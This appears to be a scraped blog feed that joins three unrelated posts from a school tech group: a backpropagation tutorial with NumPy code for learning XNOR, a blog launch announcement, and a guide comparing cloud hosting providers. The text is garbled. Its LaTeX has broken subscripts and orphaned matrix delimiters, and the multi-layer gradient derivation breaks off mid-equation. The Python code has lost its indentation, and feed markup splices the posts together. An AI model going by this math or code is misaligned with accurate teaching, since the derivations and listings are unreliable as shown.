Wonderful, we have just found out this amazing method, where we just add $\mathbf{x}$ to the front. Normally this method is not possible but it is just possible in this special case as we dont have to consider terms such as $\frac{\partial c}{\partial{\mathbf{z}}*{2}}\frac{\partial {\mathbf{z}}*{2}}{\partial{w}_{11}}$ because they are just 0. It helps us dodge all the possibilites of tensor calculus (at least for now) and allows the NumPy multiplication to be much easier. $f$ can also generalize for any vector to scalar function, not just the specific steps we make.

The next speedbump is much more easier to grasp than the last one, and that is element-wise operations. In this case, we have the activation function $\sigma:\mathbb{R}^{n} \rightarrow \mathbb{R}^{n}$ or $\sigma:\mathbb{R} \rightarrow \mathbb{R}$, which looks like a sigmoid function, but this is just a placeholder function. It can be any $\mathbb{R}$ to $\mathbb{R}$ activation function, such as $\text{RELU}(x) = \text{max}(x, 0)$, or whatever else has been found in research, such as SMELU and GELU. Once again, we work it out for every single value, as shown below:

\begin{bmatrix}
\sigma({\mathbf{z}}*{1}) \
\sigma({\mathbf{z}}*{2}) \
\sigma({\mathbf{z}}_{3})
\end{bmatrix}
\end{aligned}
$$

Now for the 48th billion time, we calculate the Jacobian by calculating every individual derivative to get the general property of the operation.

$$
\begin{aligned}
\frac{\partial \mathbf{a}}{\partial \mathbf{z}} &=
\begin{bmatrix}
\frac{\partial {\mathbf{a}}*{1}}{\partial{\mathbf{z}}*{1}} & \frac{\partial {\mathbf{a}}*{1}}{\partial{\mathbf{z}}*{2}}& \frac{\partial {\mathbf{a}}*{1}}{\partial{\mathbf{z}}*{3}}\
\frac{\partial {\mathbf{a}}*{2}}{\partial{\mathbf{z}}*{1}} & \frac{\partial {\mathbf{a}}*{2}}{\partial{\mathbf{z}}*{2}} & \frac{\partial {\mathbf{a}}*{2}}{\partial{\mathbf{z}}*{3}}\
\frac{\partial {\mathbf{a}}*{3}}{\partial{\mathbf{z}}*{1}} & \frac{\partial {\mathbf{a}}*{3}}{\partial{\mathbf{z}}*{2}} & \frac{\partial {\mathbf{a}}*{3}}{\partial{\mathbf{z}}*{3}}
\end{bmatrix}\
\frac{\partial {\mathbf{a}}*{1}}{\partial{\mathbf{z}}*{1}}=\sigma^{'}(\mathbf{z}*{1})\quad
\frac{\partial {\mathbf{a}}*{1}}{\partial{\mathbf{z}}*{2}}&=0\quad
\frac{\partial {\mathbf{a}}*{1}}{\partial{\mathbf{z}}*{3}}=0\
\frac{\partial {\mathbf{a}}*{2}}{\partial{\mathbf{z}}*{1}}=0\quad
\frac{\partial {\mathbf{a}}*{2}}{\partial{\mathbf{z}}*{2}}&=\sigma^{'}(\mathbf{z}*{2})\quad
\frac{\partial {\mathbf{a}}*{2}}{\partial{\mathbf{z}}*{3}}=0\
\frac{\partial {\mathbf{a}}*{3}}{\partial{\mathbf{z}}*{1}}=0\quad
\frac{\partial {\mathbf{a}}*{3}}{\partial{\mathbf{z}}*{2}}&=0\quad
\frac{\partial {\mathbf{a}}*{3}}{\partial{\mathbf{z}}*{3}}=\sigma^{'}(\mathbf{z}*{3})\
\frac{\partial \mathbf{a}}{\partial \mathbf{z}} &=
\begin{bmatrix}
\sigma^{'}(\mathbf{z}*{1}) & 0 & 0\
0 & \sigma^{'}(\mathbf{z}*{2}) & 0\
0 & 0 & \sigma^{'}(\mathbf{z}*{3})\
\end{bmatrix}
=diag(\sigma^{'}(\mathbf{z}))
\end{aligned}
$$

As you see, we can reduce this derivative to this specific value. I have used the $diag$ operator which converts a vector to a diagonal matrix. Finally, after all this derivation (mathematically and figuratively) we can use chain rule to join everything together:

$$ \begin{aligned} \frac{\partial c}{\partial \mathbf{b}}=\frac{\partial c}{\partial \mathbf{a}}\frac{\partial \mathbf{a}}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial \mathbf{b}} &= \frac{2}{n}{(\mathbf{a}-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z}))\ \frac{\partial c}{\partial \mathbf{x}}=\frac{\partial c}{\partial \mathbf{a}}\frac{\partial \mathbf{a}}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial \mathbf{x}} &= \frac{2}{n}{(\mathbf{a}-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z}))W\ \frac{\partial c}{\partial W}=\frac{\partial c}{\partial \mathbf{a}}\frac{\partial \mathbf{a}}{\partial \mathbf{z}}\frac{\partial \mathbf{z}}{\partial W} &= \frac{2}{n}\mathbf{x}{(\mathbf{a}-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z})) \end{aligned} $$

Now that we got these simple definitions for the single-layer case, we can expand it to the multi-layer case.

$$
\begin{aligned}
\mathbf{a}*{0}&=\mathbf{x}\
\mathbf{z}*{i}&={W}*{i-1}{\mathbf{a}}*{i-1} + \mathbf{b}*{i-1}\
\mathbf{a}*{i}&=\sigma(\mathbf{z}*{i})\
i &= 1,2,3,...,L\
c&=\frac{1}{n}|{\mathbf{a}-\mathbf {y}}|*{2}^{2}
\end{aligned}
$$

We can do the calculus for the $i$-th layer now, specifically for bias and weight using the chain rule.

$$
\begin{aligned}
\frac{\partial c}{\partial \mathbf{b}*{i-1}}=\frac{\partial c}{\partial \mathbf{a}*{L}}\frac{\partial \mathbf{a}*L}{\partial \mathbf{z}*{L}}\frac{\partial \mathbf{z}*{L}}{\partial \mathbf{a}*{L-1}}\cdots\frac{\partial \mathbf{a}*{i}}{\partial \mathbf{z}*{i}}\frac{\partial \mathbf{z}*{i}}{\partial \mathbf{b}*{i-1}}&=
\frac{2}{n}{(\mathbf{a}*L-\mathbf{y})}^{T}diag(\sigma^{'}(\mathbf{z} L))W{L-1}\cdots diag(\sigma^{'}(\mathbf{z}i))\
\frac{\partial c}{\partial W{i-1}}=\frac{\partial c}{\partial \mathbf{a}*{L}}\frac{\partial \mathbf{a}

Now it is time to actually implement this network (finally).

I couldn't find a good, but rather small dataset because most people really do like large datasets and are infuriated when they are not provided that like ~~entitled brats~~ normal people. So, instead, I decided that we will train our neural network to mimic the XNOR gate.

Oh no! Training? Testing? What is that? In all fairness, I am simply trying to show you that the mathematical functions that dictate neural networks as we have found above, fits perfectly with this task of a neural network, and that these neural networks that everyone hears about can really just mimic any function.

For those who do not know, the XNOR gates inputs and outputs are written above. It is pretty suitable for this example, because the inputs and outputs are all 0 and 1, hence it is fast to train and there is no bias in the data.

From here, let's try coding out the (x,y) pairs in NumPy:

```
data = [[np.array([[0],[0]], dtype=np.float64),np.array([[1]], dtype=np.float64)],
[np.array([[0],[1]], dtype=np.float64),np.array([[0]], dtype=np.float64)],
[np.array([[1],[0]], dtype=np.float64),np.array([[0]], dtype=np.float64)],
[np.array([[1],[1]], dtype=np.float64),np.array([[1]], dtype=np.float64)]]
```

We then define a network structure. It doesn't have to be too complex because it is a pretty simple function. I decided on a $2 \rightarrow 3 \rightarrow 1$ multi-layer perceptron (MLP) structure, with the sigmoid activation function.

Next, let's try coding out our mathematical work based off the following class:

```
class NNdata:
def __init__(self):
self.a_0 = None
self.W_0 = np.random.rand(3,2)
self.b_0 = np.random.rand(3,1)
self.z_1 = None
self.a_1 = None
self.W_1 = np.random.rand(1,3)
self.b_1 = np.random.rand(1,1)
self.z_2 = None
self.a_2 = None
self.db_1 = None
self.dw_1 = None
self.db_0 = None
self.dw_0 = None
def sigmoid(self, x):
return 1 / (1 + np.exp(-x))
def sigmoid_derivative(self, x):
return self.sigmoid(x) * (1 - self.sigmoid(x))
def feed_forward(self, x):
self.a_0 = x
self.z_1 = np.matmul(self.W_0, self.a_0)+self.b_0
self.a_1 = self.sigmoid(self.z_1)
self.z_2 = np.matmul(self.W_1, self.a_1)+self.b_1
self.a_2 = self.sigmoid(self.z_2)
return self.a_2
def loss(self, y):
return np.linalg.norm(self.a_2-y)**2
def back_prop(self, y):
dcdz_2 = 2 * np.matmul((self.a_2-y).T,np.diag(self.sigmoid_derivative(self.z_2).reshape(1)))
dcdb_1 = dcdz_2
dcdw_1 = np.matmul(self.a_1, dcdz_2)
dcda_1 = np.matmul(dcdz_2, self.W_1)
dcdz_1 = np.matmul(dcda_1, np.diag(self.sigmoid_derivative(self.z_1).reshape(3)))
dcdb_0 = dcdz_1
dcdw_0 = np.matmul(self.a_0, dcdz_1)
self.db_1 = dcdb_1.T
self.dw_1 = dcdw_1.T
self.db_0 = dcdb_0.T
self.dw_0 = dcdw_0.T
```

Next I program gradient descent. There are 3 kinds of gradient descent when there are multiple datapoints, Stochastic, Batch and Mini-Batch. In Stochastic Gradient Descent (SGD), the weights are updated after a single sample is run. This will obviously cause your step towards the ideal value be very chaotic. In Batch Gradient Descent, the weights are updated after every sample is run, and the net step is the sum/average of all the $\nabla F(x)$, which is less chaotic, but steps are less frequent.

Of course, in real life, we can never know which algorithm is better without making an assumption about the data. (No Free Lunch Theorem) A good compromise is Mini-Batch Gradient Descent, which is like Batch Gradient Descent but use smaller chunks of all the datapoints every step. In this case, I use Batch Gradient Descent.

```
nndata = NNdata()
learning_rate = 0.1
for i in range(10000):
db_1_batch = []
dw_1_batch = []
db_0_batch = []
dw_0_batch = []
c = []
for j in range(4):
nndata.feed_forward(data[j][0])
c.append(nndata.loss(data[j][1]))
nndata.back_prop(data[j][1])
db_1_batch.append(nndata.db_1)
dw_1_batch.append(nndata.dw_1)
db_0_batch.append(nndata.db_0)
dw_0_batch.append(nndata.dw_0)
if((i+1) % 1000 == 0):
print("loss (%d/10000): %.3f" % (i+1, sum(c)/4))
nndata.b_1 -= learning_rate * sum(db_1_batch)
nndata.W_1 -= learning_rate * sum(dw_1_batch)
nndata.b_0 -= learning_rate * sum(db_0_batch)
nndata.W_0 -= learning_rate * sum(dw_0_batch)
```

Output resource:

```
loss (1000/10000): 0.245
loss (2000/10000): 0.186
loss (3000/10000): 0.029
loss (4000/10000): 0.007
loss (5000/10000): 0.003
loss (6000/10000): 0.002
loss (7000/10000): 0.002
loss (8000/10000): 0.001
loss (9000/10000): 0.001
loss (10000/10000): 0.001
```

Voila! We have officially programmed Neural Networks from scratch. Pat yourself on the back for reading through this. And of course, if you bothered to code this out, try porting it over to different languages like Java, JS or even C (yikes why would anyone subjects themselves to that?).

In the next part, it is time for the actual hard part. Good luck!

A lot of people think I just collated a bunch of sources and rephrased, and honestly I walked into writing this thinking I would be doing just that. The problem is that many sources who have attempted to do this, only cover the single to multi-perceptron layer case and not the multi to multi-perceptron case. Which is pretty sad. The true math is hidden behind mountains of research papers that loosely connect to give the results of this blogpot which I am too incomponent to connect by myself. So, I just did the math myself. (The math may not be presented in this way but it works so it should be correct) Yes, it was a bit crazy, and it destroyed me to my core. This was a great character building moment for me. So these are the actual sources:

- https://numpy.org/
- https://en.wikipedia.org/wiki/Gradient_descent
- https://en.wikipedia.org/wiki/Matrix_calculus
- https://en.wikipedia.org/wiki/Tensor_calculus
- https://en.wikipedia.org/wiki/Ricci_calculus
- https://en.wikipedia.org/wiki/XNOR_gate
- CS5131 Notes (Special thanks to Mr Chua and Mr Ng)

(Excruciatingly edited by Prannaya)

]]>```
console.log("Hello, World!");
```

Jokes aside, while we don't have a fixed posting schedule presently, here are things you can expect: write-ups after our CTF events, medium-style articles by our members on the latest tech news, reflections and sharings on projects, or even musings from interesting experiences and events we hold for the school and community.

Now, if you're curious why this is a thing: my motivation for redesigning the AppVenture website (again) was because I hoped to make something that's simpler and maintainable in the future. I actually thought the original website in Go was really nice, but because AppVenture is moving to TypeScript and Vue, it'll be difficult to get people who can continue to maintain in the long term. I didn't like the next version in Nuxt.js, however, because with the little content we had, setting up a database felt overkill. It also meant more annoying backups than just copying a git repository around. And, that's how we ended up with Gridsome.

Since we're going to redesign the site, I thought it'll be a good chance to include more than just a project showcase. For an interest group, a blog seemed like a great chance for members to share about any cool things they may be up to. Especially with the new stuff launched this year, such as the cybersecurity division and monthly sharings. Of course, I can't predict how the future of this will go though, since it'll launch after I graduate. But, I'm pretty optimistic about it.

If you're interested in this blog, stay tuned for more!

(Psst: If you're a nushie interested to write something or simply cross-post your articles here, feel free to contact us)

]]>- A static/dynamic website
- A backend API
- Miscellaneous self-hosted services like Nextcloud, Wallabag, AirSonic etc.
- Compute (Simulations, AI)
- Running a botnet

or other usecases, then it can be hard to choose which service to use, especially for the thinking self-hoster wishing optimize their productivity. In fact, here is the list of cloud services I'll be covering in this post alone.

**Static webhosts**

- Vercel
- Netlify
- Surge.sh
- Github pages (+ Github actions)

**Big Cloud**

- Amazon Web Services (AWS)
- Google Cloud Products (GCP)
- Oracle Cloud

**Independent Virtual Private Server (VPS) Providers**

- DigitalOcean
- Linode
- Vultr

Thus, in this guide, I'll share some of my experiences with these products and my humble evaluation of performance, cost, and the strings attached. But first, let's find you your very own server for free.

Oracle, a company which has racked up many sins, has made amends and bestows users 200GB boot volumes, 24GB RAM, 4 Oracle CPU server instances on its cloud platform. Well technically, due to supposed resource limitations in their Singaporean datacentres, it will play coy and may or may not allow you to max out some of the limits. Oh and you don't need to connect a credit card unlike every other cloud provider.

To setup your own server, login to your oracle cloud dashboard and click on **Create a VM instance** under Launch Resources. Choose the **Ampere series** under in the **Image and Shape** menu, make sure to save the private key for SSH and check **Specify a custom boot volume size** and set an amount as close to 200GB as it will allow. Note that in order to host stuff over the internet, you have to open your ports by configuring ingress routes on the Oracle cloud interface and also configure the firewall on the server itself.

Although not as good of a deal as Oracle's, through the GitHub student pack you can redeem $100 of DigitalOcean credits which last indefinitely, unlike the "$100 for 3 months" offers available by scouring for referral links online. With the updated pricing (billing is per hour), this will get you a 1GB server for 16 months or a 2GB server for 8 months. Alternatively, if you just want to blow it on compute resources (max. 8GB unless you request for 16GB or the specialized droplets), then you might as well just use referral links.

Up until the recent pricing updates to DigitalOcean, DigitalOcean, Linode and Vultr have had near-identical pricing where there wasn't much different between the three for their lower end servers; maybe Vultr has a bit more options. But now, only Linode and Vultr retain the classic $5-a-month droplet, and they consistently beat digitalocean by pricepoint for each of the basic tier options.

**Linode Pricing**

**Vultr Pricing**

Linode and Vultr also offer a greater variety of specialized server options like those focused on memory or CPU or ones with special processors. If you are going to pay for a VPS, might as well pick either of these.

GCP stands out with its generous 90-day $300USD ($400SGD) free trial, and is very flexible in the resource, specs and processors you can allocate. But even with the credits, GPUs are only available on request. This may make GCP seem great amazing for compute but first its time for a tale of horror.

I had a projected where I needed to run some CPU-intensive physics simulations. My team was on a tight schedule with the deadline in only a few days and we output from a few thousand runs of the simulation. First, we ran it on a GCP instance with 24 E2 processors, with every other relevant setting maxed out. But while a single run on a regular computer would take 2m5s for 1 run and 5m21s for 12 runs with multithreading, only 100 runs were completed in 10 hours overnight on the GCP instance. Maybe its cause as Google put it, "E2s fire in bursts" so we tried 8 C2s then 8 N1s instead, but it didn't help. The following graph shows the peak in CPU usage when the script running the simulation is first started, and how CPU goes to zero and stays there after a while.

In the end, a humble 8GB digitalocean server finished 1.3k runs in 13 hours. A fair improvement.

While AWS is widely used by enterprises, I'd suggest towards looking at alternatives if they exist for your usecase as:

- It is easy to get accidental charges and wake up with a hefty bill since you need to connect a credit card.
- Free tier options aren't that great and usually have better alternatives elsewhere.
- Much more expensive than its competitors.

However, AWS lambda (and maybe some other niche products) is pretty good and has a generous free tier so its cool in my book.

To summarize, we will now go over some specific usecases.

I want to host a static (generated) website.

If you have a simple HTML5 site you want to quickly deploy, then surge.sh is a service that allows you to quickly host it with a domain like `victorious-drain.surge.sh`

.

For anything more than that, there's either hosting it on Github Pages or a service like Vercel or Netlify. Github Pages has neat features like extended support for Jekyll apps (which are pretty cool) and even statically generated website (e.g. Hugo, Next.js apps) can be hosted on Github Pages using community-made Github Actions. Github Pages domains are also less shady. But there are some minor annoyances like the interface being rudimentary and thus it can be hard to troubleshoot issues with custom domain names or building a project properly.

Netlify and Vercel is also quick to use and are more full-fledged hosting services. All you have to do is link your Github repository and it will take care of parsing the web framework, building and deploying. Vercel domains look like `custom-name.vercel.app`

while netlify domains look like `custom-name.netlify.app`

. Vercel also has site analytics which Netlify locks behind a steep paywall.

tl;dr Use Vercel

I want to self-host services like file-hosting, media servers, or run a backend API like a discord bot.

Use a free Oracle cloud server. Next.

I want to run a CPU intensive simulation for a few days.

Find referral links online for DigitalOcean (90-day $100), Linode (60-day $100 credit) or Vultr (30-day $100) servers or just use your Oracle Cloud server.

Leveraging cloud services and exploiting the generosity of crazy big cloud providers lends itself well to the spirit of hacker culture, that is to say, the DIY ethic and finding creative or elaborate solutions to minor inconveniences. I've tried hooking up my Wolfram Mathematica client to cloud compute server with Wolfram Language, or using xming to interface with COMSOL hosted somewhere else (this didn't work). I could stay and preach the value and satisfaction of self-hosting but I'll save it for another post. If you have anything you'd like to share regarding your experiences with cloud hosting, message me on discord at `meecrob/hash/8207`

or be sure to share it in the AppVenture server.